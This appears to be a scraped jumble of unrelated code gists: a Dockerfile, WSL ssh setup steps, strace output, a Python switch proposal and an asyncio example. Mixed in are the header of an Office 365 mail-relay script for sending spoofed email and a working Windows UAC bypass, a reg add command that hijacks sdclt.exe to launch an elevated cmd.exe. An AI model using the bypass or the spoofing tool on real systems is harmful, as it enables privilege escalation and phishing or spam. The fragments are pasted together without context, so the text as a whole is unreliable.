FROM debian:stretch-slim
RUN apt update
RUN apt install strace
version: '3'
Microsoft partnered with Canonical to create Bash on Ubuntu on Windows, running through a technology called the Windows Subsystem for Linux. Below are instructions on how to set up the ssh server to run automatically at boot.
/etc/ssh/sshd_config
file by running the command sudo vi /etc/ssh/sshd_config
and do the following
Port
to 2222 (or any other port above 1000)PasswordAuthentication
to yes. This can be changed back to no if ssh keys are setup.sudo service ssh --full-restart
# Here is an example of some syntax I'm proposing: | |
# See the github repo at https://github.com/mikeckennedy/python-switch | |
def test_switch(): | |
num = 7 | |
val = input("Enter a key. a, b, c or any other: ") | |
with Switch(val) as s: | |
s.case('a', process_a) | |
s.case('b', process_b) |
[sean@arch ansible]$ strace date 2>&1 | grep open | |
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 | |
open("/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 | |
open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3 | |
open("/etc/localtime", O_RDONLY|O_CLOEXEC) = 3 | |
[sean@arch ansible]$ strace touch foo 2>&1 | grep open | |
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 | |
open("/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 | |
open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3 |
#!/usr/bin/env python2 | |
# Example usage: office_365_mail_relay.py --from-addr [email protected] --to-addr [email protected] --domain example.com --subject "SPAM TIME!" --from-name "John Doe" --to-name "John Smith" | |
# 20170709 - @Und3rf10w | |
import dns.resolver | |
import socket | |
import smtplib | |
import argparse | |
from termcolor import cprint |
<# | |
.SYNOPSIS | |
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10. | |
Author: @netbiosX | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass |
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f |
import asyncio | |
loop = asyncio.get_event_loop() | |
async def hello(): | |
await asyncio.sleep(3) | |
print('Hello!') | |
if __name__ == '__main__': | |
loop.run_until_complete(hello()) | |